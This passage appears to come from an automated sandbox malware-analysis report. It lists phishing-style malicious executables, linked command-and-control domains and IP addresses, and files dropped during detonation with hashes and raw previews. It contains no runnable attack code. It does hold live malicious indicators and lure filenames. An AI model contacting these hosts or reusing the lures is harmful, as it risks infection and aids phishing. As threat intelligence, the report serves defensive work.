                                                Purchase Order_Pdf.exe | malicious | coroloboxorozor.com/base/A0BC51B15BADC621E7C2DA57F1F666B5.html
                                                Payment Notification.doc | malicious | coroloboxorozor.com/base/C31D970F225E46D6FFA42B117CC87914.html
                                                PO98000000090.jar | malicious | coroloboxorozor.com/base/6CE96E65ABD2B0982219B89A4C828006.html
                                                P O DZ564955B.exe | malicious | coroloboxorozor.com/base/EE9C9D2BE71BE93E8EF2E1EE1CA658F4.html
                                                PO98000000090.jar | malicious | coroloboxorozor.com/base/991C9BCC0F549AF2B1F88216FC377C57.html
                                                ORIGINAL090000000.jar | malicious | coroloboxorozor.com/base/768CB08D476E7FF779DD1110D477974C.html
                                                Fireman.exe | malicious | coroloboxorozor.com/base/F245078D9F23F950E50BB0B3E5A55F73.html
                                                PO No. 2995_pdf.exe | malicious | coroloboxorozor.com/base/19F80EF211BCE8F026E05C220DD03823.html
                                                NEW ORDER.exe | malicious | coroloboxorozor.com/base/55DEF9932F060D16BC71F37E3F290A51.html
                                                CN-Invoice-XXXXX9808-19011143287993.exe | malicious | coroloboxorozor.com/base/4F54EC6FA5BCCB7C8CBF2FD8D36F4A4B.html
                                                payment confirmation 0029175112.exe | malicious | coroloboxorozor.com/base/E3603C7B68AE45466E5D0F32A9A21541.html

                                                Match: 185.157.161.86
                                                Associated Sample Name / URL | Detection
                                                CN-Invoice-XXXXX9808-19011143287993.exe | malicious
                                                CN-Invoice-XXXXX9808-19011143287990.exe | malicious
                                                CN-Invoice-XXXXX9808-19011143287990.exe | malicious
                                                Order_List_PO# 081929.exe | malicious
                                                order-1812896543124646450.exe | malicious
                                                order-181289654312464649.exe | malicious
                                                order-181289654312464648.exe | malicious
                                                Order_1101201918_AUTECH.exe | malicious
                                                50404868-c352-422f-a608-7fd64b335eec.exe | malicious
                                                74725794.pdf.exe | malicious
                                                Order_List_PO# 0819289.exe | malicious

                                                                      Domains

                                                Match: nanopc.linkpc.net
                                                Associated Sample Name / URL | Detection | Context
                                                CN-Invoice-XXXXX9808-19011143287993.exe | malicious | 185.157.161.86
                                                CN-Invoice-XXXXX9808-19011143287990.exe | malicious | 185.192.70.170
                                                CN-Invoice-XXXXX9808-19011143287990.exe | malicious | 185.157.161.86
                                                Order_List_PO# 081929.exe | malicious | 185.157.161.86
                                                order-1812896543124646450.exe | malicious | 185.157.161.86
                                                order-181289654312464649.exe | malicious | 185.157.161.86
                                                order-181289654312464648.exe | malicious | 185.157.161.86
                                                ORDER PMX-PT-2001 STOCK+NOVO.exe | malicious | 185.157.162.81
                                                DHL_10177_R293_DOCUMENT.exe | malicious | 105.112.101.201

                                                Match: coroloboxorozor.com
                                                Associated Sample Name / URL | Detection | Context
                                                RFQ_#2021-2-25-1.pdf.exe | malicious | 172.67.172.17
                                                PRODUCT SPECIFICATION.exe | malicious | 172.67.172.17
                                                Sample Request for Proposal for Auditing Services.exe | malicious | 104.21.71.230
                                                DHL_document1102202068090891.exe | malicious | 172.67.172.17
                                                Dekont.pdf.exe | malicious | 172.67.172.17
                                                order inquiry.exe | malicious | 172.67.172.17
                                                IMG_5771098.xlsx | malicious | 172.67.172.17
                                                YrdW0m2bjE.exe | malicious | 104.21.71.230
                                                em6eElVbOm.exe | malicious | 104.21.71.230
                                                2070121SN-WS.exe | malicious | 172.67.172.17
                                                DOC-654354.xlsx | malicious | 104.21.71.230
                                                xQHJ4rJmTi.exe | malicious | 104.21.71.230
                                                RFQ CSDOK202040890.exe | malicious | 104.21.71.230
                                                SAL-0908889000.exe | malicious | 104.21.71.230
                                                Purchase Order_Pdf.exe | malicious | 104.21.71.230
                                                Payment Notification.doc | malicious | 172.67.172.17
                                                SecuriteInfo.com.Artemis30F445BB737F.24261.exe | malicious | 104.21.71.230
                                                PO98000000090.jar | malicious | 172.67.172.17
                                                P O DZ564955B.exe | malicious | 172.67.172.17
                                                PO98000000090.jar | malicious | 172.67.172.17

                                                                      ASN

                                                Match: CLOUDFLARENETUS
                                                Associated Sample Name / URL | Detection | Context
                                                twistercrypted.exe | malicious | 104.18.28.12
                                                C1 PureQuest PO S1026710.xlsm | malicious | 104.16.19.94
                                                C1 PureQuest PO S1026710.xlsm | malicious | 104.16.18.94
                                                C1 PureQuest PO S1026710.xlsm | malicious | 104.17.234.204
                                                Returned Message Body.exe | malicious | 172.67.188.154
                                                W175EHpHv3.exe | malicious | 172.67.194.108
                                                Bankdaten #f6356.pdf.exe | malicious | 172.67.188.154
                                                W175EHpHv3.exe | malicious | 172.67.194.108
                                                PO#2102003.exe | malicious | 172.67.188.154
                                                Qvc Order .exe | malicious | 172.67.188.154
                                                company inquiry.exe | malicious | 172.67.188.154
                                                Neue Bestellung_WJO-001, pdf.exe | malicious | 104.21.19.200
                                                Order NX-LI-15-0001.exe | malicious | 104.21.19.200
                                                TNT eInvoice_pdf.exe | malicious | 172.67.188.154
                                                000INV00776.exe | malicious | 172.67.188.154
                                                SAES-0077766.exe | malicious | 104.21.19.200
                                                PO.Attached98736.PDF.exe | malicious | 104.21.19.200
                                                mif000262021.exe | malicious | 172.67.188.154
                                                PAYMENT SWIFT USD96110_PDF.exe | malicious | 104.21.19.200
                                                RFQ_#2021-2-25-1.pdf.exe | malicious | 172.67.172.17

                                                Match: OBE-EUROPEObenetworkEuropeSE
                                                Associated Sample Name / URL | Detection | Context
                                                DHL_document1102202068090891.exe | malicious | 185.157.160.229
                                                cm0Ubgm8Eu.exe | malicious | 185.86.106.202
                                                hKL7ER44NR.exe | malicious | 185.86.106.202
                                                Waybill.exe | malicious | 217.64.151.17
                                                New purchase order PO 78903215,pdf.exe | malicious | 185.86.106.202
                                                xRxGPqypIw.exe | malicious | 185.86.106.202
                                                CN-Invoice-XXXXX9808-19011143287993.exe | malicious | 185.157.161.86
                                                CN-Invoice-XXXXX9808-19011143287989.exe | malicious | 185.157.160.233
                                                REVISED ORDER 2322020.EXE | malicious | 185.86.106.202
                                                muOvK6dngg.exe | malicious | 45.148.16.42
                                                RE ICA 40 Sdn Bhd- Purchase Order#6769704.exe | malicious | 185.86.106.202
                                                Offer Request 6100003768.exe | malicious | 185.86.106.202
                                                CN-Invoice-XXXXX9808-19011143287990.exe | malicious | 185.157.161.86
                                                JFAaEh5hB6.exe | malicious | 45.148.16.42
                                                BMfiIGROO2.exe | malicious | 45.148.16.42
                                                SLAX3807432211884DL772508146394DO.exe | malicious | 194.32.146.140
                                                CN-Invoice-XXXXX9808-19011143287990.exe | malicious | 185.157.161.86
                                                18.02.2021 PAYMENT INFO.exe | malicious | 185.157.160.233
                                                DHL_Shipment_Notofication#554334.exe | malicious | 217.64.149.164
                                                07oof4WcEB.exe | malicious | 45.148.16.42

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                Match: C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
                                                Associated Sample Name / URL | Detection
                                                PRODUCT SPECIFICATION.exe | malicious
                                                DHL_document1102202068090891.exe | malicious
                                                em6eElVbOm.exe | malicious
                                                Purchase Order_Pdf.exe | malicious
                                                Fireman.exe | malicious
                                                NEW ORDER.exe | malicious
                                                CN-Invoice-XXXXX9808-19011143287993.exe | malicious
                                                payment confirmation 0029175112.exe | malicious
                                                Vrxs6evJO7.exe | malicious
                                                SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe | malicious
                                                RMe2JcmlSh.exe | malicious
                                                New Order 2300030317388 InterMetro.exe | malicious
                                                CN-Invoice-XXXXX9808-19011143287989.exe | malicious
                                                PURCHASE ITEMS.exe | malicious
                                                CN-Invoice-XXXXX9808-19011143287992.exe | malicious
                                                quotation_PR # 00459182..exe | malicious
                                                PURCHASE ORDER CONFIRMATION.exe | malicious
                                                New Order.exe | malicious
                                                PO#87498746510.exe | malicious
                                                TT.exe | malicious

                                                                                                              Created / dropped Files

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_DICYYIQK30AZ1ATY_61d1cfef5cda9156e8bf5d3a5ef80772aa5bd7d_4c8b36b8_1802e6ce\Report.wer
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16870
                                                                                                              Entropy (8bit):3.7832288732112116
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:mzpqrjj/DmHBUZMXyzlaKsUO+CZFz/u7sAS274Itx09N:0pqrjjyBUZMXyzlaqqp/u7sAX4Itx09N
                                                                                                              MD5:7064487E63E3A4637297CCD632E63772
                                                                                                              SHA1:A6DCE963E361F60A0AA1F4E7ACC5EA7139606B8C
                                                                                                              SHA-256:F01915073C4D7743D8DB767606AC3720E757BA12BFEABB3CD82F2B17563652CD
                                                                                                              SHA-512:EE78B30ACA1603509CCC9ED8C47882CE5DBA7DC262C00F8344B16E3C60E7BF9599AFE73FFDEDCC24F3A67F34158441EEB61253201F3DFD3206515EB34699ED56
                                                                                                              Malicious:false
                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.7.3.5.8.3.9.0.3.4.0.8.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.7.3.5.8.7.1.7.8.3.9.7.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.e.8.c.d.a.a.-.5.5.6.6.-.4.d.0.f.-.b.c.6.c.-.0.2.f.b.f.d.4.5.7.4.9.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.1.4.8.1.1.1.-.6.a.c.4.-.4.6.e.1.-.b.7.c.4.-.f.c.8.d.4.7.b.f.1.1.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.C.N.-.I.n.v.o.i.c.e.-.X.X.X.X.X.9.8.0.8.-.1.9.0.1.1.1.4.3.2.8.7.9.9.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.e.0.-.0.0.0.1.-.0.0.1.b.-.f.d.9.c.-.f.f.e.4.7.f.0.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.3.f.a.6.9.0.4.8.9.5.0.d.8.d.7.8.b.5.5.7.d.2.9.9.f.f.a.8.6.8.0.0.0.0.0.9.0.4.!.0.0.0.0.3.2.0.d.e.a.6.3.2.8.9.c.a.d.5.6.8.5.c.f.b.a.3.9.5.d.6.7.3.1.4.2.f.8.5.f.c.6.f.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D4B.tmp.dmp
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Feb 25 14:10:52 2021, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):315756
                                                                                                              Entropy (8bit):3.8109134708487242
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:FmIQyDfKoVveyn690bXjd+pxXAeYgIisW9gIOgF5TNbe0FUCgUBFD6:AIHTKgvO90bAp79RpDTFeSTj3e
                                                                                                              MD5:3F24F840B9869D223F418F51FDF47CE1
                                                                                                              SHA1:AF8472652BCE682B6E7C40F52970085B9CC09760
                                                                                                              SHA-256:72C7F9ED7BC6EA7DABD19108F7139DE3C2CBD01655952E74876D294854DE4ABC
                                                                                                              SHA-512:68F5FAE6D98A148ADFD411CA59D5D8CD675F34E70D5EC92D83CD73E03059174EECFE5FE3078D7DF04B0C46989A71B153F56119CE838671DC985EABAEC63BF11C
                                                                                                              Malicious:false
                                                                                                              Preview: MDMP....... ........7`...................U...........B......4-......GenuineIntelW...........T.............7`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E2E.tmp.WERInternalMetadata.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8494
                                                                                                              Entropy (8bit):3.710666372851257
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Rrl7r3GLNiKeD60V6Yr/SU+N5mTKTPgmfZoS/+pry89bZ6sf3xzm:RrlsNiKC6m6YTSU+N5mObgmfSSAZZf3o
                                                                                                              MD5:5791974E34FF7956C4D230782FB8F5A6
                                                                                                              SHA1:FAD63F7331FE93C1139385D36564AA23636F297D
                                                                                                              SHA-256:DF2F547053D6C1D141602D01960B93BA93B65B78AC1324345BFEFFC4D2F9CE36
                                                                                                              SHA-512:2BE303A58ED70D8DC700B87D52D30391277D9A8B0A147AC2F6DA53A02BADD73501700F4F049724BDC18D42E88B051D960408B23AF82C07FBE368EE45F5A6825C
                                                                                                              Malicious:false
                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.1.6.<./.P.i.d.>.......
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA68B.tmp.xml
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4800
                                                                                                              Entropy (8bit):4.567228996532901
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwSD8zs1tJgtWI9rKkWSC8Bvs8fm8M4Jeh/FFht+q8vFh//KA71zd:uITf1HcKSNxRJu5tKrHKA71zd
                                                                                                              MD5:50E2A91F31E670B3054F60A2D52F8528
                                                                                                              SHA1:6782321474333481C3B34B19D02AA6040FAAE43F
                                                                                                              SHA-256:C7B28C9B73B1C111AA04D79D2544CBDF75DD194D61CC392EBEAD7A5120174720
                                                                                                              SHA-512:47FCD52CFD76B663B9A066BD35DF9525B0865A3EFB8EC71FDA0A773EACC80C37D88BDCBC3866FB580903F20DDBCACF44EC8534C01A5B6A7867085BA5CB81E8E5
                                                                                                              Malicious:false
                                                                                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="876921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA6E7.tmp.csv
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56208
                                                                                                              Entropy (8bit):3.0530640921878747
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:aDHQeMGIvhCOc9+sA3BCrbKpO+f03hfvc:aDHQeMGIvhCOc9+sA3BCrbKpO+f035vc
                                                                                                              MD5:70B4C3FFC96DD244F3772D6F81B0783C
                                                                                                              SHA1:4B086568DF91ADEA95A354B0BBC745950A51AFFA
                                                                                                              SHA-256:71FAE19F2A3FC6FF96106AD7D829A3D5BE55A3FA06EFA8FEA77E3239E076632A
                                                                                                              SHA-512:7CD460FF3279077C2F22B09676127371D924046A7AF82850FCC9C5F20EBDB378E1BF7C3DA0DD08D08B3257C8300C17355D64E86474F91F4C1037B9A14E8AC24F
                                                                                                              Malicious:false
                                                                                                              Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC4.tmp.txt
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13340
                                                                                                              Entropy (8bit):2.6955683935498898
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:9GiZYW+TUve8IYHYcb4WgHNYEZhgst2iG9zEXwtIxraKhaAJiOnIS53:9jZD+HQzbQPNaKhaAcZS53
                                                                                                              MD5:9E8DFC94FEF322FE02E9F7E48376894A
                                                                                                              SHA1:12BD9CA05D34330269DA55CC174B9020A91BC5B0
                                                                                                              SHA-256:A81606A41BE21D9687FD67C1FF81BFF367F0F5E6BA228EB72B0E4F404EA72FEB
                                                                                                              SHA-512:6EC0936F401B10A335253BC3FAFE9D710CE8CC3E0DA95E0141C062989BD85E00CC9AFE0EF1CB2512316433F918C1C573C8DDF98DAB5722A1DBA17473484FF392
                                                                                                              Malicious:false
                                                                                                              Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):14734
                                                                                                              Entropy (8bit):4.996142136926143
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                                                                              MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                                                                              SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                                                                              SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                                                                              SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                                                                              Malicious:false
                                                                                                              Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):21664
                                                                                                              Entropy (8bit):5.600013791978551
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:/tL68qUkj8c5Eh2MQX+Rw4KnKultIqspE9mw7AhBmzq5vxHV03fjj2DI++jp:uj8cSh2Z4KKultAV3qqtibcc
                                                                                                              MD5:250E88BCD42F9C0B7EEB5173BE816D5B
                                                                                                              SHA1:5A1053254E192BE05F99BBC0F0A8ACD7550CC11B
                                                                                                              SHA-256:E0351D82E30A3C884B6950D68A1B7A3F1994B12E48488AF55E6E589FDEBB8D95
                                                                                                              SHA-512:0E4133E4B8B7C1770EA241FECFA883DAC49EA6BF167D8784ADC4F83CA75F7B8415A088DA102BFEAF0824428978346D69A60F99FCBAFDE001B12247C768730E55
                                                                                                              Malicious:false
                                                                                                              Preview: @...e.....................9.............?............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Z.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):91000
                                                                                                              Entropy (8bit):6.241345766746317
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                              MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                              SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                              SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Metadefender, Detection: 3%
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious
                                                                                                              • Filename: DHL_document1102202068090891.exe, Detection: malicious
                                                                                                              • Filename: em6eElVbOm.exe, Detection: malicious
                                                                                                              • Filename: Purchase Order_Pdf.exe, Detection: malicious
                                                                                                              • Filename: Fireman.exe, Detection: malicious
                                                                                                              • Filename: NEW ORDER.exe, Detection: malicious
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious
                                                                                                              • Filename: payment confirmation 0029175112.exe, Detection: malicious
                                                                                                              • Filename: Vrxs6evJO7.exe, Detection: malicious
                                                                                                              • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious
                                                                                                              • Filename: RMe2JcmlSh.exe, Detection: malicious
                                                                                                              • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious
                                                                                                              • Filename: PURCHASE ITEMS.exe, Detection: malicious
                                                                                                              • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious
                                                                                                              • Filename: quotation_PR # 00459182..exe, Detection: malicious
                                                                                                              • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious
                                                                                                              • Filename: New Order.exe, Detection: malicious
                                                                                                              • Filename: PO#87498746510.exe, Detection: malicious
                                                                                                              • Filename: TT.exe, Detection: malicious
                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                              C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\test.bat
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
